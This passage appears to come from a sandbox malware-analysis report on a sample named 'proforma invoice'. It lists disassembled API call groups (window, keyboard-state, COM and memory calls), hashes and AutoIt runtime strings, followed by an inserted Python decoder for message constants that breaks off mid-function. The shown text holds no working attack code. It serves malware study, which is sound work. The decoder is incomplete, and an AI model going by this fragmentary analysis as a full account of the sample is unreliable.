                  • Opcode Fuzzy Hash: c6ededa03912db855b972d332d83fc185372695c763e1f07eae9bfbc5d6cc6f4
                  • Instruction Fuzzy Hash: 9E110A32689306BAE7169B549CC3DBE7FDCDF15354B2041AEF904A62D2E7B49E00526C
                  APIs
                  Memory Dump Source
                  • Source File: 00000000.00000002.1654790446.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                  • Associated: 00000000.00000002.1654226399.0000000000AA0000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654837156.0000000000B3C000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654837156.0000000000B62000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654872970.0000000000B6C000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654887705.0000000000B74000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_aa0000_proforma invoice.jbxd
                  Similarity
                  • API ID: _wcslen$LocalTime
                  • String ID:
                  • API String ID: 952045576-0
                  • Opcode ID: 56ec14bab143e79aadbec94110c8fd5cce686eed047ebd7595d166b5170922d3
                  • Instruction ID: 3247f654447d2c3f8684a3e6cd09d4effc12cdff20ebc49f54fcf7a485a81278
                  • Opcode Fuzzy Hash: 56ec14bab143e79aadbec94110c8fd5cce686eed047ebd7595d166b5170922d3
                  • Instruction Fuzzy Hash: F341C165C1021875DB51EBF4C98AECFB7ACEF05300F11896AE528E3161FB34E245C3A9
                  APIs
                  • ShowWindow.USER32(FFFFFFFF,000000FF,?,00000000,?,00AF682C,00000004,00000000,00000000), ref: 00ABF953
                  • ShowWindow.USER32(FFFFFFFF,00000006,?,00000000,?,00AF682C,00000004,00000000,00000000), ref: 00AFF3D1
                  • ShowWindow.USER32(FFFFFFFF,000000FF,?,00000000,?,00AF682C,00000004,00000000,00000000), ref: 00AFF454
                  Memory Dump Source
                  • Source File: 00000000.00000002.1654790446.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                  • Associated: 00000000.00000002.1654226399.0000000000AA0000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654837156.0000000000B3C000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654837156.0000000000B62000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654872970.0000000000B6C000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654887705.0000000000B74000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_aa0000_proforma invoice.jbxd
                  Similarity
                  • API ID: ShowWindow
                  • String ID:
                  • API String ID: 1268545403-0
                  • Opcode ID: 51135e7e8abdd0b1b5714c7301af333b78766e71d8bc6b12d8bc2ae30eff240f
                  • Instruction ID: f48f3979648ac037c29d6497a94b66169232784a8ffbed9118fe78df9e0df074
                  • Opcode Fuzzy Hash: 51135e7e8abdd0b1b5714c7301af333b78766e71d8bc6b12d8bc2ae30eff240f
                  • Instruction Fuzzy Hash: BC411A31608680FEC7398B6D8C887BA7FA9AF56314F2C453CF59767562CA31A880D711
                  APIs
                  • DeleteObject.GDI32(00000000), ref: 00B32D1B
                  • GetDC.USER32(00000000), ref: 00B32D23
                  • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00B32D2E
                  • ReleaseDC.USER32(00000000,00000000), ref: 00B32D3A
                  • CreateFontW.GDI32(?,00000000,00000000,00000000,?,00000000,00000000,00000000,00000001,00000004,00000000,?,00000000,?), ref: 00B32D76
                  • SendMessageW.USER32(?,00000030,00000000,00000001), ref: 00B32D87
                  • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,00B35A65,?,?,000000FF,00000000,?,000000FF,?), ref: 00B32DC2
                  • SendMessageW.USER32(?,00000142,00000000,00000000), ref: 00B32DE1
                  Memory Dump Source
                  • Source File: 00000000.00000002.1654790446.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                  • Associated: 00000000.00000002.1654226399.0000000000AA0000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654837156.0000000000B3C000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654837156.0000000000B62000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654872970.0000000000B6C000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654887705.0000000000B74000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_aa0000_proforma invoice.jbxd
                  Similarity
                  • API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
                  • String ID:
                  • API String ID: 3864802216-0
                  • Opcode ID: 3ed0af1975dce459d02d1290a50b2359ad1873ea282ef5f7b63cb98c7ef68467
                  • Instruction ID: 40a4e64328ed3dd48f64b960fd8415447c4070a453b7caac736e89fa700a0223
                  • Opcode Fuzzy Hash: 3ed0af1975dce459d02d1290a50b2359ad1873ea282ef5f7b63cb98c7ef68467
                  • Instruction Fuzzy Hash: 85316D72201614BBEB114F54CC8AFEB3FA9EB09715F144065FE08AB291CA759C50C7A4
                  APIs
                  Memory Dump Source
                  • Source File: 00000000.00000002.1654790446.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                  • Associated: 00000000.00000002.1654226399.0000000000AA0000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654837156.0000000000B3C000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654837156.0000000000B62000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654872970.0000000000B6C000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654887705.0000000000B74000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_aa0000_proforma invoice.jbxd
                  Similarity
                  • API ID: _memcmp
                  • String ID:
                  • API String ID: 2931989736-0
                  • Opcode ID: e16690067118611a3f2b666a306aaab13178921508b502d34b99ff00fdd5234c
                  • Instruction ID: 93830b4aad345ef1e9b9ec060a0ccc2911427af0bd11f485a90adae81c5360ef
                  • Opcode Fuzzy Hash: e16690067118611a3f2b666a306aaab13178921508b502d34b99ff00fdd5234c
                  • Instruction Fuzzy Hash: C8219861B40A097BD62459118F82FBB37DCEE22384F5400A4FD055AAC2F722ED1089A5
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1654790446.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                  • Associated: 00000000.00000002.1654226399.0000000000AA0000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654837156.0000000000B3C000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654837156.0000000000B62000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654872970.0000000000B6C000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654887705.0000000000B74000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_aa0000_proforma invoice.jbxd
                  Similarity
                  • API ID:
                  • String ID: NULL Pointer assignment$Not an Object type
                  • API String ID: 0-572801152
                  • Opcode ID: 2e06c0f87de9fbdb25098c6b2eaabe243e04a0d5a6e04a50b304eedc0c88e509
                  • Instruction ID: 1cbb337eb9e91e4b9e87b80fa500b8761dccb30280b6b426f6cf339ecbec70d5
                  • Opcode Fuzzy Hash: 2e06c0f87de9fbdb25098c6b2eaabe243e04a0d5a6e04a50b304eedc0c88e509
                  • Instruction Fuzzy Hash: 9FD1B371A0061A9FDF20CF98D881BAEB7F5FF48354F1484A9E919AB291E770DD41CB90
                  APIs
                  • GetCPInfo.KERNEL32(?,?), ref: 00AE15CE
                  • MultiByteToWideChar.KERNEL32(?,00000009,?,?,00000000,00000000), ref: 00AE1651
                  • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 00AE16E4
                  • MultiByteToWideChar.KERNEL32(?,00000009,?,?,00000000,00000000), ref: 00AE16FB
                    • Part of subcall function 00AD3820: RtlAllocateHeap.NTDLL(00000000,?,00B71444,?,00ABFDF5,?,?,00AAA976,00000010,00B71440,00AA13FC,?,00AA13C6,?,00AA1129), ref: 00AD3852
                  • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 00AE1777
                  • __freea.LIBCMT ref: 00AE17A2
                  • __freea.LIBCMT ref: 00AE17AE
                  Memory Dump Source
                  • Source File: 00000000.00000002.1654790446.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                  • Associated: 00000000.00000002.1654226399.0000000000AA0000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654837156.0000000000B3C000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654837156.0000000000B62000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654872970.0000000000B6C000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654887705.0000000000B74000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_aa0000_proforma invoice.jbxd
                  Similarity
                  • API ID: ByteCharMultiWide$__freea$AllocateHeapInfo
                  • String ID:
                  • API String ID: 2829977744-0
                  • Opcode ID: 8e8101046a96f76e49f51ed6cc31997f2f776c02e9bd858d4d7f487bebd6f68e
                  • Instruction ID: 455793d82890471944ff2b22ad155aec0643b6b575f646fe9fb12ea883ea64a7
                  • Opcode Fuzzy Hash: 8e8101046a96f76e49f51ed6cc31997f2f776c02e9bd858d4d7f487bebd6f68e
                  • Instruction Fuzzy Hash: 0D91B572E002A69EDF208FB6CD81EEE7BB5AF49750F184659E812E7181DB35DD40CB60
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1654790446.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                  • Associated: 00000000.00000002.1654226399.0000000000AA0000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654837156.0000000000B3C000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654837156.0000000000B62000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654872970.0000000000B6C000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654887705.0000000000B74000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_aa0000_proforma invoice.jbxd
                  Similarity
                  • API ID: Variant$ClearInit
                  • String ID: Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop
                  • API String ID: 2610073882-625585964
                  • Opcode ID: aaf4d71bfe4d2cd556fee68ad1e56b23c5bc57a8e822f2f9eadeacd7de491384
                  • Instruction ID: cbb9e1edf6777ec79402e0289d338279e369cb6f8bb1618c77b1430283dfa0de
                  • Opcode Fuzzy Hash: aaf4d71bfe4d2cd556fee68ad1e56b23c5bc57a8e822f2f9eadeacd7de491384
                  • Instruction Fuzzy Hash: E2917171A00225ABDF20CFA4D884FAEBBF8EF46714F108599F519AB291D7709D45CFA0
                  APIs
                  • SafeArrayGetVartype.OLEAUT32(00000001,?), ref: 00B1125C
                  • SafeArrayAccessData.OLEAUT32(00000000,?), ref: 00B11284
                  • SafeArrayUnaccessData.OLEAUT32(00000001), ref: 00B112A8
                  • SafeArrayAccessData.OLEAUT32(00000001,?), ref: 00B112D8
                  • SafeArrayAccessData.OLEAUT32(00000001,?), ref: 00B1135F
                  • SafeArrayAccessData.OLEAUT32(00000001,?), ref: 00B113C4
                  • SafeArrayAccessData.OLEAUT32(00000001,?), ref: 00B11430
                  Memory Dump Source
                  • Source File: 00000000.00000002.1654790446.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                  • Associated: 00000000.00000002.1654226399.0000000000AA0000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654837156.0000000000B3C000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654837156.0000000000B62000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654872970.0000000000B6C000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654887705.0000000000B74000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_aa0000_proforma invoice.jbxd
                  Similarity
                  • API ID: ArraySafe$Data$Access$UnaccessVartype
                  • String ID:
                  • API String ID: 2550207440-0
                  • Opcode ID: 48411ac9c3d499fd0ed32ecf771c09c969b938fca5f41fe8e5106cc3e15f61cd
                  • Instruction ID: 851aa296d78ee741550d45d0284e27618ec102de903c174718b2a80b30412379
                  • Opcode Fuzzy Hash: 48411ac9c3d499fd0ed32ecf771c09c969b938fca5f41fe8e5106cc3e15f61cd
                  • Instruction Fuzzy Hash: A991EF71A00219AFDB00DFA8D884BFEB7F5FF45714F6448A9E600E7291D774A981CB90
                  Memory Dump Source
                  • Source File: 00000000.00000002.1654790446.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                  • Associated: 00000000.00000002.1654226399.0000000000AA0000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654837156.0000000000B3C000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654837156.0000000000B62000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654872970.0000000000B6C000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654887705.0000000000B74000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_aa0000_proforma invoice.jbxd
                  Similarity
                  • API ID: ObjectSelect$BeginCreatePath
                  • String ID:
                  • API String ID: 3225163088-0
                  • Opcode ID: 7322e70888a30633045cb745656fe2577fe4c70e4027653d2e6427e255633a59
                  • Instruction ID: e6f6722f8762a45557504a901515b8085739183273e059b8a5eac7be9581b4fe
                  • Opcode Fuzzy Hash: 7322e70888a30633045cb745656fe2577fe4c70e4027653d2e6427e255633a59
                  • Instruction Fuzzy Hash: AB912671D40219EFCB14CFA9CD84AEEBBB8FF49320F248155E615B7252D774AA41CB60
                  APIs
                  • VariantInit.OLEAUT32(?), ref: 00B2396B
                  • CharUpperBuffW.USER32(?,?), ref: 00B23A7A
                  • _wcslen.LIBCMT ref: 00B23A8A
                  • VariantClear.OLEAUT32(?), ref: 00B23C1F
                    • Part of subcall function 00B10CDF: VariantInit.OLEAUT32(00000000), ref: 00B10D1F
                    • Part of subcall function 00B10CDF: VariantCopy.OLEAUT32(?,?), ref: 00B10D28
                    • Part of subcall function 00B10CDF: VariantClear.OLEAUT32(?), ref: 00B10D34
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1654790446.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                  • Associated: 00000000.00000002.1654226399.0000000000AA0000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654837156.0000000000B3C000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654837156.0000000000B62000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654872970.0000000000B6C000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654887705.0000000000B74000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_aa0000_proforma invoice.jbxd
                  Similarity
                  • API ID: Variant$ClearInit$BuffCharCopyUpper_wcslen
                  • String ID: AUTOIT.ERROR$Incorrect Parameter format
                  • API String ID: 4137639002-1221869570
                  • Opcode ID: 391cb92be5df232133795e481024a3f618f2a95c595026f87bf517acd9c66b2e
                  • Instruction ID: c698cdb931498e128b36d3608857dab85f8e59ddfc42cd261e6c902d8e529e4d
                  • Opcode Fuzzy Hash: 391cb92be5df232133795e481024a3f618f2a95c595026f87bf517acd9c66b2e
                  • Instruction Fuzzy Hash: D89179746083119FC700EF24D58496ABBE4FF89714F1489ADF88A9B351DB34EE45CB92
                  APIs
                    • Part of subcall function 00B0000E: CLSIDFromProgID.OLE32(?,?,?,00000000,?,?,?,-C000001E,00000001,?,00AFFF41,80070057,?,?,?,00B0035E), ref: 00B0002B
                    • Part of subcall function 00B0000E: ProgIDFromCLSID.OLE32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,00AFFF41,80070057,?,?), ref: 00B00046
                    • Part of subcall function 00B0000E: lstrcmpiW.KERNEL32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,00AFFF41,80070057,?,?), ref: 00B00054
                    • Part of subcall function 00B0000E: CoTaskMemFree.OLE32(00000000,?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,00AFFF41,80070057,?), ref: 00B00064
                  • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000,00000001,?,?), ref: 00B24C51
                  • _wcslen.LIBCMT ref: 00B24D59
                  • CoCreateInstanceEx.OLE32(?,00000000,00000015,?,00000001,?), ref: 00B24DCF
                  • CoTaskMemFree.OLE32(?), ref: 00B24DDA
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1654790446.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                  • Associated: 00000000.00000002.1654226399.0000000000AA0000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654837156.0000000000B3C000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654837156.0000000000B62000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654872970.0000000000B6C000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654887705.0000000000B74000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_aa0000_proforma invoice.jbxd
                  Similarity
                  • API ID: FreeFromProgTask$CreateInitializeInstanceSecurity_wcslenlstrcmpi
                  • String ID: NULL Pointer assignment
                  • API String ID: 614568839-2785691316
                  • Opcode ID: 343fe58a6b7e1b7679ddc21cd76f373896007cf069f2444e09077500a51707d0
                  • Instruction ID: dfb54bfc02b64c30e874dea6c2f686290c6f6b778957d43a4d23e75784b59d06
                  • Opcode Fuzzy Hash: 343fe58a6b7e1b7679ddc21cd76f373896007cf069f2444e09077500a51707d0
                  • Instruction Fuzzy Hash: 1C910871D002299FDF14DFA4D891AEEBBB9FF09310F1085A9E519A7291DB349E44CF60
                  APIs
                  • GetMenu.USER32(?), ref: 00B32183
                  • GetMenuItemCount.USER32(00000000), ref: 00B321B5
                  • GetMenuStringW.USER32(00000000,00000000,?,00007FFF,00000400), ref: 00B321DD
                  • _wcslen.LIBCMT ref: 00B32213
                  • GetMenuItemID.USER32(?,?), ref: 00B3224D
                  • GetSubMenu.USER32(?,?), ref: 00B3225B
                    • Part of subcall function 00B03A3D: GetWindowThreadProcessId.USER32(?,00000000), ref: 00B03A57
                    • Part of subcall function 00B03A3D: GetCurrentThreadId.KERNEL32 ref: 00B03A5E
                    • Part of subcall function 00B03A3D: AttachThreadInput.USER32(00000000,?,00000000,00000000,?,00B025B3), ref: 00B03A65
                  • PostMessageW.USER32(?,00000111,00000000,00000000), ref: 00B322E3
                    • Part of subcall function 00B0E97B: Sleep.KERNEL32 ref: 00B0E9F3
                  Memory Dump Source
                  • Source File: 00000000.00000002.1654790446.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                  • Associated: 00000000.00000002.1654226399.0000000000AA0000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654837156.0000000000B3C000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654837156.0000000000B62000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654872970.0000000000B6C000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654887705.0000000000B74000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_aa0000_proforma invoice.jbxd
                  Similarity
                  • API ID: Menu$Thread$Item$AttachCountCurrentInputMessagePostProcessSleepStringWindow_wcslen
                  • String ID:
                  • API String ID: 4196846111-0
                  • Opcode ID: 8ce270f3f63adfb7e71a9cfdd9df5c1e1dcbf066b1bb98e3bf29ca87e1c305cc
                  • Instruction ID: 7b458a94339b3426a987cdba00cceea0aabdda17772410e0c6fa498edff7b749
                  • Opcode Fuzzy Hash: 8ce270f3f63adfb7e71a9cfdd9df5c1e1dcbf066b1bb98e3bf29ca87e1c305cc
                  • Instruction Fuzzy Hash: D4715D75A00215AFCB10DFA4CD85AAEBBF5EF49310F248499E916BB351DB34ED418B90
                  APIs
                  • IsWindow.USER32(014F6318), ref: 00B37F37
                  • IsWindowEnabled.USER32(014F6318), ref: 00B37F43
                  • SendMessageW.USER32(?,0000041C,00000000,00000000), ref: 00B3801E
                  • SendMessageW.USER32(014F6318,000000B0,?,?), ref: 00B38051
                  • IsDlgButtonChecked.USER32(?,?), ref: 00B38089
                  • GetWindowLongW.USER32(014F6318,000000EC), ref: 00B380AB
                  • SendMessageW.USER32(?,000000A1,00000002,00000000), ref: 00B380C3
                  Memory Dump Source
                  • Source File: 00000000.00000002.1654790446.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                  • Associated: 00000000.00000002.1654226399.0000000000AA0000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654837156.0000000000B3C000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654837156.0000000000B62000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654872970.0000000000B6C000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654887705.0000000000B74000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_aa0000_proforma invoice.jbxd
                  Similarity
                  • API ID: MessageSendWindow$ButtonCheckedEnabledLong
                  • String ID:
                  • API String ID: 4072528602-0
                  • Opcode ID: 10ce3e6a9e96b4672286f4c52e456b3a756d55f391169bfdab1997542f77d809
                  • Instruction ID: 14f4caca54454e20e8a72612644b4ffa47d74e11f7d1b1f6d44f150d5c2e42e9
                  • Opcode Fuzzy Hash: 10ce3e6a9e96b4672286f4c52e456b3a756d55f391169bfdab1997542f77d809
                  • Instruction Fuzzy Hash: B771ADB4648244AFEB359F68C884FAABBF9FF09300F244499F94597261CF31A845CB60
                  APIs
                  • GetParent.USER32(?), ref: 00B0AEF9
                  • GetKeyboardState.USER32(?), ref: 00B0AF0E
                  • SetKeyboardState.USER32(?), ref: 00B0AF6F
                  • PostMessageW.USER32(?,00000101,00000010,?), ref: 00B0AF9D
                  • PostMessageW.USER32(?,00000101,00000011,?), ref: 00B0AFBC
                  • PostMessageW.USER32(?,00000101,00000012,?), ref: 00B0AFFD
                  • PostMessageW.USER32(?,00000101,0000005B,?), ref: 00B0B020
                  Memory Dump Source
                  • Source File: 00000000.00000002.1654790446.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                  • Associated: 00000000.00000002.1654226399.0000000000AA0000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654837156.0000000000B3C000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654837156.0000000000B62000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654872970.0000000000B6C000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654887705.0000000000B74000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_aa0000_proforma invoice.jbxd
                  Similarity
                  • API ID: MessagePost$KeyboardState$Parent
                  • String ID:
                  • API String ID: 87235514-0
                  • Opcode ID: a90b80bb5d7a64d95125be7dad75a0373d2312e507836846b6cc53876ee0851e
                  • Instruction ID: ca9d65e746198ee2b6991838d889173d8200c8062a45f5b32730b2be270fa5c2
                  • Opcode Fuzzy Hash: a90b80bb5d7a64d95125be7dad75a0373d2312e507836846b6cc53876ee0851e
                  • Instruction Fuzzy Hash: A15191A1A047D63DFB368334CC45BBABEE99B06304F0889C9E1D9968C2D799ACC4D751
                  APIs
                  • GetParent.USER32(00000000), ref: 00B0AD19
                  • GetKeyboardState.USER32(?), ref: 00B0AD2E
                  • SetKeyboardState.USER32(?), ref: 00B0AD8F
                  • PostMessageW.USER32(00000000,00000100,00000010,?), ref: 00B0ADBB
                  • PostMessageW.USER32(00000000,00000100,00000011,?), ref: 00B0ADD8
                  • PostMessageW.USER32(00000000,00000100,00000012,?), ref: 00B0AE17
                  • PostMessageW.USER32(00000000,00000100,0000005B,?), ref: 00B0AE38
                  Memory Dump Source
                  • Source File: 00000000.00000002.1654790446.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                  • Associated: 00000000.00000002.1654226399.0000000000AA0000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654837156.0000000000B3C000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654837156.0000000000B62000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654872970.0000000000B6C000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654887705.0000000000B74000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_aa0000_proforma invoice.jbxd
                  Similarity
                  • API ID: MessagePost$KeyboardState$Parent
                  • String ID:
                  • API String ID: 87235514-0
                  • Opcode ID: 8c9ab3a60bc8eae247920d78df2a905f03f103eea1207cb11db81f739760cdab
                  • Instruction ID: 5272706eb954ee66564b29b57b2f41506da94b43914ae05ed5de94dc82b8370b
                  • Opcode Fuzzy Hash: 8c9ab3a60bc8eae247920d78df2a905f03f103eea1207cb11db81f739760cdab
                  • Instruction Fuzzy Hash: 4051F5A15047D53DFB338334CC95BBABEE8AB46300F1889D9E1D5568C3D694EC88D762
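Decoding the raw constants in the two PostMessageW listings above (an added example, not part of the Joe Sandbox report): the Python below parses "APIs" bullets in the plugin's line format and replaces numeric arguments with their Windows SDK names. The constant values are the public SDK definitions (winuser.h, commctrl.h, winsock2.h); the parsing regex and the modifier-release heuristic are this example's own assumptions about the listing format, not anything the plugin provides. Run over bullets copied from this report, the two functions resolve to WM_KEYDOWN/WM_KEYUP with VK_SHIFT, VK_CONTROL, VK_MENU and VK_LWIN, i.e. the code presses or releases every modifier key on the parent window; the same decoder names AF_INET/SOCK_STREAM/IPPROTO_TCP in the socket() call and WM_NCLBUTTONDOWN/HTCAPTION (the window-drag idiom) in a SendMessageW call that appear in later listings.

```python
import re

# Windows SDK constants (winuser.h, commctrl.h, winsock2.h). These are the public
# SDK values, not anything recovered from the sample.
WINDOW_MESSAGES = {
    0x0030: "WM_SETFONT", 0x00A1: "WM_NCLBUTTONDOWN", 0x00B0: "EM_GETSEL",
    0x00F0: "BM_GETCHECK", 0x00F1: "BM_SETCHECK",
    0x0100: "WM_KEYDOWN", 0x0101: "WM_KEYUP",
    0x0401: "PBM_SETRANGE", 0x0402: "PBM_SETPOS", 0x0404: "PBM_SETSTEP",
    0x0409: "PBM_SETBARCOLOR", 0x2001: "PBM_SETBKCOLOR",
}
VIRTUAL_KEYS = {0x10: "VK_SHIFT", 0x11: "VK_CONTROL", 0x12: "VK_MENU", 0x5B: "VK_LWIN"}
HIT_TEST = {0x02: "HTCAPTION"}
MB_FLAGS = [(0x00000010, "MB_ICONERROR"), (0x00001000, "MB_SYSTEMMODAL"),
            (0x00010000, "MB_SETFOREGROUND")]
MODIFIERS = {0x10, 0x11, 0x12, 0x5B}

# One bullet of an "APIs" list as the Joe Sandbox IDA plugin prints it, e.g.
#   • PostMessageW.USER32(00000000,00000100,00000010,?), ref: 00B0ADBB
# (assumed format, derived from the listings in this report)
API_LINE = re.compile(
    r"^\s*•\s*(?:Part of subcall function [0-9A-F]+:\s*)?"
    r"(?P<api>\w+)\.(?P<module>\w+)"
    r"(?:\((?P<args>[^)]*)\))?"
    r"(?:,?\s*ref:\s*(?P<ref>[0-9A-F]+))?"
)


def parse_api_line(line):
    """Split one API bullet into api, module, argument list and code address."""
    m = API_LINE.match(line)
    if not m:
        return None
    raw = m.group("args")
    args = [a.strip() for a in raw.split(",")] if raw else []
    return {"api": m.group("api"), "module": m.group("module"),
            "args": args, "ref": m.group("ref")}


def _hex(arg):
    """Hex argument as int; None for '?' and other unresolved values."""
    try:
        return int(arg, 16)
    except ValueError:
        return None


def decode_mb_flags(value):
    """Expand a MessageBox uType bitmask into the flag names it contains."""
    names = [name for bit, name in MB_FLAGS if value & bit]
    rest = value & ~sum(bit for bit, _ in MB_FLAGS)
    if rest:
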